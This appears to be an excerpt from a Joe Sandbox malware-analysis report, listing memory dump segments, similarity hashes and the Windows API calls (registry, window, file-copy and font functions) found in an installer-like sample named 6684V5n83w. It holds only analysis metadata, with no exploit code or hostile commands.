                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                                                                      • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                                                                      • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                                                                                                                                                                                                                                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                                                      • String ID: $@rD
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3748168415-881980237
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                                                      • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
